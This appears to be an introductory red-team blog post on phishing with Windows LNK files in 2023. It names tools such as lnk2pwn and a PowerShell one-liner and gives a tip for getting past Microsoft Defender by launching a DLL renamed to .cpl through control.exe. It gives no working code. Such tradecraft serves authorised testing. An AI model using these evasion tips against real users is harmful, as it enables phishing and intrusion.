Home Grown Red Team: LNK Phishing Revisited In 2023
All right so macros are out, ISOs, zips and password protected zips are all getting flagged. What’s an APT to do? Well, LNK files are still going strong against certain defenses. I’ve done a few posts about using LNK files and batch scripts in OneNote, but Microsoft has officially given command execution from OneNote files the boot. In this write-up, we’re going to explore a few different ways to get code execution from LNK files with some familiar tools from previous posts.
This isn’t going to go super in-depth with crazy evasion techniques and these method probably won’t work against heavy duty EDR, but we’re going to test it out against Microsoft Defender For Endpoint (trial edition). This is just a POC, so we’re going to use lnk2pwn and a powershell oneliner. Should you use this in a real engagement, I would do some more research on using a LOLBIN with more evasive command execution.
A CPL file is a control panel item. If you’re wondering how to make one, just make a DLL and then rename it with the .cpl file extension. This allows you to double click on it for execution instead of launching rundll32.exe. CPL files are launched by control.exe, which calls a few other LOLBINs, including rundll32. But Defender doesn’t seem to mind if you launch rundll32 from control.exe, just if you run rundll32 from powershell.
0 Comments